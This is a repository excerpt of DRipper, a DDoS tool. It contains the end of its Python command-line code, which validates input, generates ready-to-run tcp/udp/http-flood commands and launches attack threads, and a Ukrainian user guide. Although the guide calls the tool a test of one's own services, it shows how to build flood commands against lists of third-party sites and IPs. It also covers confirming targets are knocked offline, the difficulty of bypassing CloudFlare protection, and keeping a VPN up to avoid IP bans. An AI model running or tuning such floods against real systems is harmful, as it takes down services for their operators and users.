{udp_uri}' 170 | http_attack = f'-t {ARGS_DEFAULT_THREADS_COUNT} -e {ARGS_DEFAULT_HTTP_ATTACK_METHOD}{http_uri}' 171 | 172 | res = '' 173 | for a in ['tcp-flood', 'udp-flood', 'http-flood']: 174 | if a == 'tcp-flood': 175 | attack_args = tcp_attack 176 | elif a == 'udp-flood': 177 | attack_args = udp_attack 178 | else: 179 | attack_args = http_attack 180 | 181 | res += '[green]{attack} attack:[/]\n'.format(attack=a.upper()) 182 | for c in ['dripper', 'python DRipper.py', 'python3 DRipper.py', f'docker run -it --rm alexmon1989/dripper:{__version__}']: 183 | res += '{command} {attack_args}\n'.format(command=c, attack_args=attack_args) 184 | if c.startswith('dripper') or c.startswith('python3'): 185 | res += '\n' 186 | res += '\n' 187 | Console().print(res, new_line_start=True) 188 | 189 | 190 | def validate_input(args) -> bool: 191 | """Validates input params.""" 192 | # Do not validate targets if reads targets from file or remote location 193 | if args.targets_list is None: 194 | for target_uri in args.targets: 195 | if not Target.validate_format(target_uri): 196 | common.print_panel( 197 | f'Wrong target format in [yellow]{target_uri}[/]. Check param -s (--targets) {args.targets}\n' 198 | f'Target should be in next format: ' + '{scheme}://{hostname}[:{port}][{path}]\n\n' + 199 | f'Possible target format may be:\n' 200 | f'[yellow]tcp://{target_uri}, udp://{target_uri}, http://{target_uri}, https://{target_uri}[/]' 201 | ) 202 | return False 203 | 204 | if args.threads_count != 'auto' and (not str(args.threads_count).isdigit() or int(args.threads_count) < 1): 205 | common.print_panel(f'Wrong threads count. Check param [yellow]-t (--threads) {args.threads_count}[/]') 206 | generate_valid_commands(args.targets) 207 | return False 208 | 209 | if args.attack_method is not None and args.attack_method.lower() not in attack_method_labels: 210 | common.print_panel( 211 | f'Wrong attack type. Check param [yellow]-m (--method) {args.attack_method}[/]\n' 212 | f'Possible options: {", ".join(attack_method_labels)}') 213 | generate_valid_commands(args.targets) 214 | return False 215 | 216 | if args.http_method and args.http_method.lower() not in ('get', 'post', 'head', 'put', 'delete', 'trace', 'connect', 'options', 'patch'): 217 | common.print_panel( 218 | f'Wrong HTTP method type. Check param [yellow]-e (--http-method) {args.http_method}[/]\n' 219 | f'Possible options: get, post, head, put, delete, trace, connect, options, patch.') 220 | generate_valid_commands(args.targets) 221 | return False 222 | 223 | if args.proxy_type and args.proxy_type.lower() not in ('http', 'socks5', 'socks4'): 224 | common.print_panel( 225 | f'Wrong Proxy type. Check param [yellow]-k (--proxy-type) {args.proxy_type}[/]\n' 226 | f'Possible options: http, socks5, socks4.') 227 | generate_valid_commands(args.targets) 228 | return False 229 | 230 | return True 231 | 232 | 233 | def render_statistics(_ctx: Context) -> None: 234 | """Show DRipper runtime statistics.""" 235 | console = Console(width=MIN_SCREEN_WIDTH) 236 | 237 | update_available = '' 238 | if _ctx.latest_version is not None and _ctx.current_version < _ctx.latest_version: 239 | update_available = f'\n[u green reverse link={GITHUB_URL}/releases] Newer version {_ctx.latest_version.version} is available! [/]' 240 | 241 | logo = Panel(LOGO_COLOR + update_available, box=box.SIMPLE) 242 | console.print(logo, justify='center') 243 | 244 | with Live(_ctx.stats.build_stats(), vertical_overflow='visible', refresh_per_second=2) as live: 245 | live.start() 246 | while True: 247 | refresh_context_details(_ctx) 248 | live.update(_ctx.stats.build_stats()) 249 | # time.sleep(0.2) 250 | if _ctx.dry_run: 251 | break 252 | 253 | 254 | def main(): 255 | """The main function to run the script from the command line.""" 256 | console = Console(width=MIN_SCREEN_WIDTH) 257 | console.rule(f'[bold]Starting DRipper {VERSION}') 258 | 259 | args = arg_parser.create_parser().parse_args() 260 | 261 | if len(sys.argv) < 2 or not validate_input(args[0]): 262 | exit("\nRun 'dripper -h' for help.") 263 | 264 | # Init Events Log 265 | # TODO events journal should not be a singleton as it depends on args. Move it under the context! 266 | events_journal.set_log_size(getattr(args[0], 'log_size', DEFAULT_LOG_SIZE)) 267 | events_journal.set_max_event_level(getattr(args[0], 'event_level', DEFAULT_LOG_LEVEL)) 268 | 269 | _ctx = Context(args[0]) 270 | # go_home(_ctx) 271 | 272 | _ctx.logger.log('Check for DRipper Updates...') 273 | guc = GithubUpdatesChecker() 274 | _ctx.latest_version = guc.fetch_latest_version() 275 | _ctx.logger.log(f'Latest version is: {_ctx.latest_version.version}') 276 | 277 | # _ctx.logger.rule('[bold]Check connection with targets') 278 | # for target in _ctx.targets_manager.targets[:]: 279 | # # Proxies should be validated during the runtime 280 | # retry_cnt = 1 if _ctx.proxy_manager.proxy_list_initial_len > 0 or target.attack_method == 'udp' else 3 281 | # # TODO Make it concurrent for each target 282 | # if not connect_host_loop(_ctx=_ctx, target=target, retry_cnt=retry_cnt): 283 | # _ctx.targets_manager.delete_target(target) 284 | # _ctx.logger.rule() 285 | 286 | if len(_ctx.targets_manager.targets) == 0: 287 | _ctx.logger.log('All targets looks dead. Unable to connect to targets.\nPlease select another targets to run DRipper') 288 | exit(1) 289 | 290 | _ctx.validate() 291 | 292 | # Start Threads 293 | time.sleep(.5) 294 | _ctx.targets_manager.allocate_attacks() 295 | _ctx.duration_manager.start_countdown() 296 | 297 | render_statistics(_ctx) 298 | 299 | 300 | def signal_handler(signum, frame): 301 | """Signal handler for gracefully shutdown threads by keyboard interrupting.""" 302 | exit_event.set() 303 | raise KeyboardInterrupt 304 | 305 | 306 | def cli(): 307 | try: 308 | signal.signal(signal.SIGINT, signal_handler) 309 | sys.exit(main()) 310 | except KeyboardInterrupt: # The user hit Control-C 311 | sys.stderr.write('\n\nReceived keyboard interrupt, terminating.\n\n') 312 | sys.stderr.flush() 313 | # Control-C is fatal error signal 2, for more see 314 | # https://tldp.org/LDP/abs/html/exitcodes.html 315 | sys.exit(128 + signal.SIGINT) 316 | except RuntimeError as exc: 317 | sys.stderr.write(f'\n{exc}\n\n') 318 | sys.stderr.flush() 319 | sys.exit(1) 320 | 321 | 322 | if __name__ == '__main__': 323 | cli() 324 | -------------------------------------------------------------------------------- /docs/UserGuide.md: -------------------------------------------------------------------------------- 1 | # DRipper інструкція користувача 2 | 3 | **DRipper** - скорочено від DDoS Ripper. За основу DRipper спочатку було взято скрипт DDoS Ripper, 4 | який було оптимізовано, а потім повністю переписано для того, щоб досягти максимальної ефективності та інформативності. 5 | Розробники скрипта DRipper – це українці! 6 | 7 | **DRipper** - це скрипт для тестування власних сервісів користувача на рівень стійкості до DDoS атак. 8 | Користувач має змогу оцінити (протестувати) свої власні сервіси на рівень стійкості (захисту) від DDoS атак. 9 | На основі результатів тесту і логів DRipper користувач має змогу покращити захист своїх власних сервісів. 10 | 11 | ![DRipper interface](./images/dripper_interface.jpg) 12 | 13 | --- 14 | 15 | ## Основні властивості DRipper 16 | 17 | #### Одночасна робота скрипта по багатьох цілям. 18 | Скрипт може одночасно атакувати різні цілі різними методами. Підтримуються методи **tcp/udp/http flood**. 19 | Для цього потрібно лише передати набір цілей у форматі `{scheme}://{hostname}[:{port}][{path}]`. 20 | 21 | > Наприклад: tcp://site1.com:80, або udp://site2.com:53, або http://site3.com:80, або https://site4.com:443 22 | 23 | #### Автоматична перевірка нових версій DRipper. 24 | 25 | Як тільки з'являється нова версія DRipper, скрипт про це повідомить. Функція перевірки оновлення доступна, починаючи з версії **2.5.0** 26 | 27 | #### Детальна статистика по кожній цілі 28 | 29 | По кожній цілі ведеться окрема статистика, яка показує: 30 | 31 | - Код країни та IP адреса сервера 32 | - Поточний метод атаки 33 | - Кількість потоків, які працюють по цій конкретній цілі (в режимі роботи по багатьох цілям потоки розподіляються по цілях рівномірно при старті скрипта) 34 | - Інформація про те, чи знаходиться сервер під захистом CloudFlare від DDoS атак 35 | - Інформація від **check-host.net** сервіса по доступності цілі 36 | - Інформація по кількості відправлених даних і середньої швидкості даних 37 | - Інформація по кількості відправлених пакетів і середньої швидкості пакетів з даними 38 | - Інформація по успішному/неуспішному з'єднанню з сервісом 39 | - Розподілена статистика по кодам відповіді сервіса (для http атак) 40 | - Детальний журнал подій по всім цілям і процесам 41 | 42 | ``` 43 | Country, Host IP -- 127.0.0.1:8070 (target-0) 44 | Attack Method UDP-FLOOD 45 | Threads 200 46 | CloudFlare Protection Not protected 47 | Availability (check-host.net) Your IP was blocked with anti-bot or anti DDoS 48 | Check status - CTRL+click on link 49 | Sent Bytes @ AVG speed 189.98 MB @ 1.20 MB/s 50 | Sent Packets @ AVG speed 388,334 @ 2453 packets/s 51 | Connections success: 200, failed: 0, success rate: 100 % 52 | ───────────────────────────────────────────────────────────────────────────────────────────── 53 | 54 | Events Log 55 | ───────────────────────────────────────────────────────────────────────────────────────────── 56 | [11:54:59] info target-0 thread-195 Creating new UDP connection... 57 | [11:54:59] info target-0 thread-193 Creating new UDP connection... 58 | [11:54:59] info target-0 thread-199 Creating new UDP connection... 59 | [11:55:00] info target-0 thread-197 Creating new UDP connection... 60 | [11:55:00] info target-0 thread-198 Creating new UDP connection... 61 | ``` 62 | 63 | #### Перевірка доступності цілі за допомогою зовнішнього сервісу (check-host.net) 64 | 65 | Для кожної цілі автоматично через певний проміжок часу виконується запит на перевірку доступності цілі за допомогою 66 | зовнішнього сервісу. Така перевірка в автоматичному режимі допомагає зрозуміти, чи ціль ще жива та відповідає, чи вже ні. 67 | 68 | **check-host** сервіс може обмежувати доступ до свого ресурсу за допомогою CloudFlare anti-bot 69 | і перевірка скриптом в автоматичному режимі може не працювати. 70 | **DRipper** автоматично визначає такий захист і не намагається більше виконувати 71 | перевірку для того, щоб не отримати BAN і Вашу ІР не заблокували повністю. 72 | В такому випадку замість результатів перевірки з'являється повідомлення з прямим посиланням (hyperlink) для переходу 73 | на сторінку перевірки за допомогою браузера. 74 | 75 | #### Перевірка цілей на захист від DDoS від CloudFlare 76 | 77 | Кожна ціль перевіряється на захист від DDoS за допомогою CloudFlare. Оскільки атака на сервіс, який знаходиться 78 | за CloudFlare anti DDoS не буде ефективною, то перевірка на початку атаки повідомить Вам про це і дасть змогу приймати рішення щодо подальших дій. 79 | 80 | Також **DRipper** для атаки **http-flood** аналізує відповіді та помилки від сервера, серед яких, 81 | якщо будуть ознаки Rate limit (обмеження на кількість запитів за одиницю часу), 82 | anti-DDoS - скрипт повідомить про це і вчасно зупинить атаку для того, щоб запобігти блокуванню вашої публічної ІР адреси. 83 | 84 | #### Перевірка на Rate Limits 85 | 86 | Скрипт автоматично перевіряє у фоновому режимі доступність цілі саме з Вашого публічного IP для того, 87 | щоб оперативно відстежувати блокування й обмеження, які можуть з'явитися під час атаки. 88 | Одне з таких обмежень - це ліміти на кількість запитів з одної ІР адреси. 89 | У випадку, коли сервіс має такі механізми - **DRipper** повідомить про це в **Events log**, що дасть Вам змогу приймати 90 | рішення щодо подальших тому, що така атака вже не є ефективною. 91 | 92 | #### Автоматична перевірка VPN з'єднання 93 | 94 | Під час роботи скрипта періодично йде перевірка зовнішньої ІР адреси і якщо ІР змінився з початку запуску скрипта, то **DRipper** повідомить про це. 95 | 96 | #### Генератор команд для запуску скрипта, якщо користувач помилився з аргументами команди 97 | 98 | Починаючи з версії скрипта **2.5.0**, якщо користувач помилився з командою, окрім повідомлення про помилку 99 | буде ще й список команд для всіх атак, з яких можна обрати готову команду і запустити скрипт. 100 | 101 | ``` 102 | python3 DRipper.py -t 200 --log-level info -s udp://localhost:8070 -m tcp 103 | ╭──────────────────────────────────────────────────────────────────────────────────────────────────╮ 104 | │ Wrong attack type. Check param -m (--method) tcp │ 105 | │ Possible options: udp-flood, tcp-flood, http-flood, http-bypass │ 106 | ╰──────────────────────────────────────────────────────────────────────────────────────────────────╯ 107 | TCP-FLOOD attack: 108 | dripper -t 100 -r 1 -l 1024 -s tcp://localhost:8070 109 | 110 | python DRipper.py -t 100 -r 1 -l 1024 -s tcp://localhost:8070 111 | python3 DRipper.py -t 100 -r 1 -l 1024 -s tcp://localhost:8070 112 | 113 | docker run -it --rm alexmon1989/dripper:2.5.0 -t 100 -r 1 -l 1024 -s tcp://localhost:8070 114 | 115 | UDP-FLOOD attack: 116 | dripper -t 100 -r 1 -l 1024 -s udp://localhost:8070 117 | 118 | python DRipper.py -t 100 -r 1 -l 1024 -s udp://localhost:8070 119 | python3 DRipper.py -t 100 -r 1 -l 1024 -s udp://localhost:8070 120 | 121 | docker run -it --rm alexmon1989/dripper:2.5.0 -t 100 -r 1 -l 1024 -s udp://localhost:8070 122 | 123 | HTTP-FLOOD attack: 124 | dripper -t 100 -e GET -s http://localhost:8070 125 | 126 | python DRipper.py -t 100 -e GET -s http://localhost:8070 127 | python3 DRipper.py -t 100 -e GET -s http://localhost:8070 128 | 129 | docker run -it --rm alexmon1989/dripper:2.5.0 -t 100 -e GET -s http://localhost:8070 130 | ``` 131 | 132 | --- 133 | 134 | ## Команди DRipper 135 | 136 | Для того, щоб атакувати ціль, достатньо мінімальних базових знань в галузі Web-технологій. 137 | 138 | Скрипт працює на операційних системах Linux, macOS, Windows. Для запуску скрипта потрібен **Python** >= 3.9 версії або Docker. 139 | 140 | Розглянемо на прикладі як створити команду для запуску скрипта, якщо у Вас є в наявності деякий список цілей. 141 | 142 | ```bash 143 | # Приклад списку цілей: 144 | 145 | https://site1.tv 146 | 111.22.33.444 (80/tcp, 443/tcp, 53/udp) 147 | 148 | https://www.site2.ru 149 | 222.33.444.555 (25/tcp, 80/tcp, 443/tcp) 150 | 333.33.555.678 (25/tcp, 80/tcp, 443/tcp) 151 | 152 | http://www.site3.com 153 | ``` 154 | 155 | На основі вище вказаного списку, можемо створити команди для атак різних типів, 156 | наприклад для сайта `https://site1.tv` і `https://www.site2.ru` відомі ІР адреси і порти. 157 | Для них дуже легко створити команду для атаки. А для `http://www.site3.com` - немає ніякої додаткової інформації, 158 | тому створимо для цього ресурсу всі можливі варіанти. 159 | 160 | ```bash 161 | # Приклад атак на основі списку цілей: 162 | 163 | # Ціль 1 164 | # https://site1.tv 165 | # 111.22.33.444 (80/tcp, 443/tcp, 53/udp) 166 | 167 | # Атака 1 168 | python3 DRipper.py -t 300 \ 169 | -s tcp://111.22.33.444:80 \ 170 | -s tcp://111.22.33.444:443 \ 171 | -s udp://111.22.33.444:53 172 | ``` 173 | 174 | Для атаки на 3-й варіант, можна використати тільки назву сайта, а метод атаки додати перед назвою. 175 | Звісно, треба розуміти, що така атака імовірніше не буде ефективною, тому, що невідомо які порти відкрито назовні, які методи захисту є у сайта і т.і. 176 | 177 | ```bash 178 | # Ціль 3 179 | # http://www.site3.com 180 | 181 | # Атака 3 182 | python3 DRipper.py -t 300 \ 183 | -s tcp://www.site3.com \ 184 | -s udp://www.site3.com \ 185 | -s http://www.site3.com 186 | ``` 187 | 188 | --- 189 | 190 | ## Статистика DRipper 191 | 192 | Розглянемо результати атаки **http-flood** для одної цілі й розберемось з тим, що саме показує статистика. 193 | 194 | ```bash 195 | ────────────────────────────────────────────────────────────────────────────────────────────────── 196 | Description Status 197 | ────────────────────────────────────────────────────────────────────────────────────────────────── 198 | Start Time, Duration 2022-04-10 17:11:56 (0:00:52) 199 | Your Country, Public IP NL 89.***.***.*** 200 | vCPU Count 8 201 | Socket Timeout (seconds) 60 202 | Random Packet Length True | Max length: 1024 203 | ────────────────────────────────────────────────────────────────────────────────────────────────── 204 | Country, Host IP RU 91.222.33.444:443 (target-0) 205 | HTTP Request GET: https://www.site1.ru:443/ 206 | Attack Method HTTP-FLOOD 207 | Threads 200 208 | CloudFlare Protection Not protected 209 | Availability (check-host.net) [17:12:12] Accessible in 19 of 21 zones (90%) 210 | Sent Bytes @ AVG speed 33.21 MB @ 646.59 kB/s 211 | Sent Packets @ AVG speed 77,187 @ 1467 packets/s 212 | Connections success: 180, failed: 120, success rate: 60 % 213 | ────────────────────────────────────────────────────────────────────────────────────────────────── 214 | Status Code Distribution 200: 100% 215 | ────────────────────────────────────────────────────────────────────────────────────────────────── 216 | 217 | Events Log 218 | ────────────────────────────────────────────────────────────────────────────────────────────────── 219 | [17:12:49] info target-0 thread-7 Creating HTTP connection... 220 | [17:12:49] error target-0 thread-197 BrokenPipeError: [Errno 32] Broken pipe 221 | [17:12:49] error target-0 thread-9 BrokenPipeError: [Errno 32] Broken pipe 222 | [17:12:49] info target-0 thread-9 Creating HTTP connection... 223 | [17:12:49] info target-0 thread-197 Creating HTTP connection... 224 | ``` 225 | 226 | - **Country, Host IP** 227 | 228 | Тут код країни `RU` та ІР адреса цілі `91.222.33.444:443`. Також є ідентифікатор цілі `(target-0)`, за яким 229 | можна зрозуміти яка подія в **Events log** стосується цілі. 230 | 231 | - **HTTP Request** 232 | 233 | HTTP method і адреса на яку скрипт відправляє пакети (запити). Для tcp-flood, udp-flood атак цього пункта в статистиці немає. 234 | 235 | - **Attack Method** 236 | 237 | Назва методу атаки, наприклад: TCP-FLOOD, UDP-FLOOD, HTTP-FLOOD. 238 | 239 | - **Threads** 240 | 241 | Кількість потоків з яких йде атака. Потоки рівномірно розподіляються між цілями при старті скрипта. 242 | Треба розуміти, що кількість потоків і ефективність використання цих потоків залежить від потужності Вашого ПК. 243 | 244 | - **CloudFlare Protection** 245 | 246 | Інформація про те, че є CloudFlare захист на сайті (Not protected - немає, Protected - є захист) 247 | > У випадку коли є захист - атака буде закінчена автоматично для того, щоб Ваша ІР адреса не попала 248 | до чорного списку ІР адрес на цьому сайті. Крім того, атака на сайт з захистом дуже не ефективна. 249 | 250 | Захист CloudFlare, якщо не заглиблюватись в деталі, працює приблизно наступним чином. 251 | Перед сторінкою сайта наприклад це може бути головна сторінка сайту, додається сторінка CloudFlare, на якій є скрипт, 252 | що аналізує протягом 5 секунд кількість запитів з Вашої публічної ІР адреси та одночасно з цим генерує математичне 253 | рівняння, якє повинне бути обчислене за допомогою Вашого браузера за ці 5 секунд, що аналізуються. Коли користувач відкриває 254 | сторінку з таким захистом, то він бачить повідомлення про те що його браузер перевіряється і треба зачекати умовно 5 секунд. 255 | Після цього - користувач перенаправляється на сторінку, яку він запросив. Начебто все просто... логічним було б просто зачекати 5 секунд перед атакою, 256 | а потім вже атакувати такій ресурс. Але не все так просто. 257 | 258 | Для DDoS скрипта немає особливої складності розпізнати, що сторінка або сайт мають такий захист. Основна проблема полягає в тому, 259 | що потрібно отримати javascript код сторінки сайта, проаналізувати частини рівняння цього коду 260 | (а CloudFlare постійно змінює ці частини коду і їх кількість), потім вирішити це рівняння і отримати контрольну сумму. 261 | Результат обчислення треба передати з наступним запитом DDoS пакета, записавши його в тому форматі (ідентифікатор - результат), 262 | що було закладено CloudFlare для цієї сторінки. Якщо таке завдання вирішити - CloudFlare перенаправить всі запити на цільовий ресурс. 263 | Але, якщо не вирішити завдання, або вирішити не вірно - доступ до ресурсу буде заблоковано. Але і це ще не все. 264 | Через декілька хвилин знову буде перевірка, але інакша, буде перевірятися кількість відправлених запитів 265 | і якщо вона перевищить дозволену кількість - знову буде перевірка, як спочатку. 266 | 267 | Саме тому, атака на ресурси за CloudFlare не буде ефективною, так, як в процесі атаки треба буде вирішувати завдання, 268 | щоб обійти захист, чекати по 5 секунд для перевірки, потім робити паузи, щоб не перевищити ліміти по запитах. 269 | А ще треба зважити на те, що потрібен час розробників для постійного вдосконалення механізмів обходу захисту. 270 | Популярні бібліотеки для обходу такого захисту просто не встигають за тими змінами в алгоритмах захисту, що постійно 271 | змінюються у CloudFlare. 272 | 273 | - **Availability (check-host.net)** 274 | 275 | Інформація про доступність сайта. Для перевірки використовуються сервери розміщені у різноманітних регіонах. 276 | На момент написання даної інструкції доступні 21 регіон (Australia - Perth, Austria - Salzburg, Canada - Toronto, 277 | France - Paris, Germany - Frankfurt, Hong Kong - Hong Kong, Iran - Tehran, Italy - Milan, Kazakhstan - Karaganda, 278 | Lithuania - Vilnius, Moldova - Chisinau, Netherlands - Amsterdam, Portugal - Viana, Russia - Moscow, Russia - Moscow, 279 | Switzerland - Zurich, Turkey - Istanbul, Ukraine - Khmelnytskyi, Ukraine - Kyiv, USA - Los Angeles, USA - New Jersey). 280 | 281 | `[17:12:12]` - час останньої перевірки 282 | 283 | `Accessible in 19 of 21 zones (90%)` - сайт доступний у 19 з 21 зони (регіон перевірки), 90% - це загальний відсоток доступності. 284 | Коли відсоток стає менше 50% - це означає, що сайт майже не працює, тим самим підкреслює ефективність атаки. 285 | 286 | У випадку, коли на сайті **check-host.net** є захист CloudFlare від ботів, скрипт знаходить такий захист 287 | і перестає надсилати періодичні запити для отримання доступності сайта, для того, щоб Ваша ІР адреса не була заблокована сервісом. 288 | В такому випадку **DRipper** повідомить про це і надасть посилання для перевірки доступності цілі за допомогою браузера. 289 | 290 | Для переходу на сайт з перевіркою доступності цілі треба затиснути **CTRL** і натиснути на посилання *link* 291 | 292 | ```bash 293 | Availability (check-host.net) Your IP was blocked with anti-bot or anti DDoS 294 | Check status - CTRL+click on link 295 | ``` 296 | 297 | - **Sent Bytes @ AVG speed** 298 | 299 | Статистика по об'єму даних, які було відправлено. `33.21 MB @ 646.59 kB/s` - означає, 300 | що було всього відправлено 32.21 Мб з середньою швидкістю 646.59 kB/s. 301 | 302 | Під час атаки треба дивитися на загальний об'єм відправлених даних, вони повинні постійно зростати. 303 | Якщо цей показник не збільшується, це означає, що данні не доходять до сервера. 304 | Показник швидкості - це значення, яке вказує на середню швидкість передавання даних за весь проміжок часу. 305 | Коли данні не передаються, то середня швидкість зменшується, а коли данні передаються, то цей показник або зростає, 306 | або трохи змінюється відносно свого значення. 307 | 308 | - **Sent Packets @ AVG speed** 309 | 310 | Статистика по об'єму пакетів з даними, що було передано. `77,187 @ 1467 packets/s` - означає, що всього було 311 | відправлено 77.178 пакетів (або запитів) з середньою швидкістю 1467 packets/s (для http-flood одиниця виміру - requests/s). 312 | На показники кількості пакетів і швидкості пакетів дивитися треба так само як вказано в поясненні до *Sent Bytes @ AVG speed* 313 | 314 | - **Connections** 315 | 316 | Статистика по з'єднанню. `success: 180` - каже про те, що під час роботи скрипта було створено 180 вдалих з'єднань 317 | з сервером для відправки даних. `failed: 120` - це кількість з'єднань, в яких виникла помилка, або таке з'єднання 318 | було розірвано. `success rate: 60 %` - статистика у вигляді відсотків, яка показує співвідношення вдалих з'єднань до невдалих. 319 | 320 | Якщо кількість з'єднань з помилками росте дуже швидко, або майже дорівнює кількості вдалих з'єднань - це, наприклад, може свідчити 321 | про можливі проблеми з VPN. В такому випадку варто замислитися над тим, щоб змінити VPN з'єднання і перезапустити атаку. 322 | 323 | З'єднання з помилками все одно будуть, бо неможливо взагалі уникнути помилок при відправці великої кількості пакетів 324 | і даних, які властиві DDoS атакам. Тому треба розуміти, що важливо дивитись саме на динаміку того, що відбувається, 325 | а не на абсолютні значення. Основне правило для з'єднань - вдалі з'єднання повинні збільшуватись слідом 326 | за невдалими - це свідчить про те, що відбувається нове з'єднання і скрипт продовжує атакувати. 327 | 328 | Success rate також треба розуміти, як орієнтовний показник, який може бути як 100%, так і 50%. І в обох випадках це нормальний показник, 329 | який просто показує наскільки якісний зв'язок. Якщо за весь час роботи скрипта не було жодних проблем із з'єднанням, то 330 | відсоток **Success rate** буде 100% і це просто ідеальний випадок. Але й коли було 10 невдалих з'єднань, то скрипт зробить 11-те вдале і продовжить 331 | працювати - **Success rate** буде 52% і це також гарний показник. Просто порівняно з ідеальним з'вязком - цей випадок з помилками 332 | з'єднання виглядає саме так з математичної точки зору. 333 | 334 | - **Status Code Distribution** 335 | 336 | Розподілена статистика по статус-кодам відповідей сервера. Що таке статус-коди і який статус що означає, 337 | детальніше можна почитати на [Wikipedia](https://uk.wikipedia.org/wiki/%D0%A1%D0%BF%D0%B8%D1%81%D0%BE%D0%BA_%D0%BA%D0%BE%D0%B4%D1%96%D0%B2_%D1%81%D1%82%D0%B0%D0%BD%D1%83_HTTP). 338 | `200: 100%` - вказує на те, що всі запити отримані сервером, оброблені. Це свідчить про успішне виконання HTTP запиту. 339 | 340 | DRipper не збирає статистику по кожному запиту, бо це б погано впливало на ефективність атаки. Тому, скрипт періодично 341 | перевіряє одну із відповідей (приблизно раз в 10 секунд) і формує статистику. 342 | 343 | - **Events log** 344 | 345 | Журнал подій, в якому видно деталі того, що відбувається з усіма цілями. 346 | Тут багато службової інформації, що може бути корисною для тих, хто розуміється на деталях роботи протоколів TCP/UDP. 347 | 348 | Але, крім деталей роботи протоколів, ще є корисна інформація про можливі помилки, які можуть виникнути під час атаки. 349 | Наприклад, Вашу ІР адресу можуть заблокувати в ручному режимі під час атаки і Ви це ніяк не можете передбачити. 350 | Якщо такє трапиться, то в журналі подій про це буде повідомлено у вигляді помилки з деталями про те, 351 | в якому потоці це відбулось і до якої цілі це відноситься. 352 | 353 | На прикладі нижче, є два повідомлення, одне з рівнем `info`, інше з рівнем `error`. 354 | Рівень `info` містить багато повідомлень, які вказують на те, що відбувається з процесами атаки. 355 | За замовчуванням цей рівень не активний - в журналі подій будуть показань тільки рівні `warn` та `error`. 356 | 357 | ```bash 358 | [17:12:49] info target-0 thread-7 Creating HTTP connection... 359 | [17:12:49] error target-0 thread-197 BrokenPipeError: [Errno 32] Broken pipe 360 | ``` 361 | 362 | Рівень `warn` - попереджує користувача про якісь події, що впливають на ефективність атаки або належать до попереджень 363 | щодо вашої приватності (статус VPN, тощо...), або наприклад про Rate limits (коли сервер обмежує кількість запитів), про блокування ІР і т.і. 364 | 365 | Рівень `error` - інформує про помилки, які виникли під час атаки. Здебільшого всі помилки опрацьовані і повідомлення 366 | про помилки несе більш інформативний характер, який допомагає зрозуміти що саме пішло не так. 367 | 368 | Наприклад `timeout error` - коли виникає багато помилок такого типу, це означає, що сервер може бути перевантажений 369 | і не встигає відповісти за певний час. Тому, помилка такого типу може стати нам як підказка для того, 370 | щоб збільшити параметр `timeout` для скрипта за допомогою додавання параметру `-o 30`, або `-o 60` 371 | (timeout 30 або 60 секунд, відповідно) до команди запуску скрипта. 372 | 373 | Багато помилок може бути таких, як `BrokenPipeError`. Такі помилки виникають при великій кількості запитів, 374 | але скрипт розуміє такі помилки і просто закриває старе з'єднання і створює нове, продовжуючи роботу потоку для цієї атаки. 375 | 376 | Кількість рядків, яка одночасно відтворюється для **Events log** може буде встановлена користувачем за допомогою 377 | параметра `--log-size=N`, де N - кількість рядків. 378 | 379 | Рівень повідомлень в **Events log** може буди встановлений за допомогою параметра `--log-level=info`, 380 | де `info` - це найнижчий рівень повідомлень, а `warn`, `error` - наступні за рівнем важливості. 381 | Також можна взагалі вимкнути журнал повідомлень за допомогою параметра `--log-level=none` 382 | --------------------------------------------------------------------------------